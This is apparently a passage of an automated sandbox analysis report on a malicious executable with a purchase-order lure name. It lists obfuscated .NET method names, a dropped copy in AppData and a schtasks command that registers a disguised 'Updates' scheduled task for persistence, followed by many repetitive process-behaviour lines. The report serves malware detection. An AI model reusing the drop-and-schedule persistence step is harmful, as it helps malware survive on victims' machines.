              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, unupZHtXVeGThL8D36.csHigh entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, O5tYpwmEKrOLf39LE6.csHigh entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, H9cpRKwuIODiPO2dgX1.csHigh entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, SuXDWccPOvK5odiT5e.csHigh entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, bJvLSL34IERm7aJscU.csHigh entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, t2qt23C1ZO7pYQfAKA.csHigh entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, AqBlQbya8Vp6IS1UoE.csHigh entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, J7ecEYjmNahUm7LApD.csHigh entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, dlx18wvlGuFkC3sMg9.csHigh entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, JdId2Rh2LV5U7y7cd7.csHigh entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, xZ2HP9w52KJ9j9OhmHp.csHigh entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, xLOmlk5E6U3TdCC4SP.csHigh entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.csHigh entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, Dqkyhukd5DPEpWtsrk.csHigh entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, hWtek0zyFhm6YOkDOc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, TVHBd5rBSDSNtLCLLd.csHigh entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, YfsUVIwKwligCWwUFOb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, G3Zlh9sDOA6l6Xdsx8.csHigh entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, XiDiD0bdPoQPVP9xtF.csHigh entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, unupZHtXVeGThL8D36.csHigh entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, O5tYpwmEKrOLf39LE6.csHigh entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, H9cpRKwuIODiPO2dgX1.csHigh entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, SuXDWccPOvK5odiT5e.csHigh entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, bJvLSL34IERm7aJscU.csHigh entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, t2qt23C1ZO7pYQfAKA.csHigh entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, AqBlQbya8Vp6IS1UoE.csHigh entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, J7ecEYjmNahUm7LApD.csHigh entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, dlx18wvlGuFkC3sMg9.csHigh entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, JdId2Rh2LV5U7y7cd7.csHigh entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, xZ2HP9w52KJ9j9OhmHp.csHigh entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, xLOmlk5E6U3TdCC4SP.csHigh entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'
              Source: C:\Users\user\Desktop\rPO0977-6745.exeFile created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
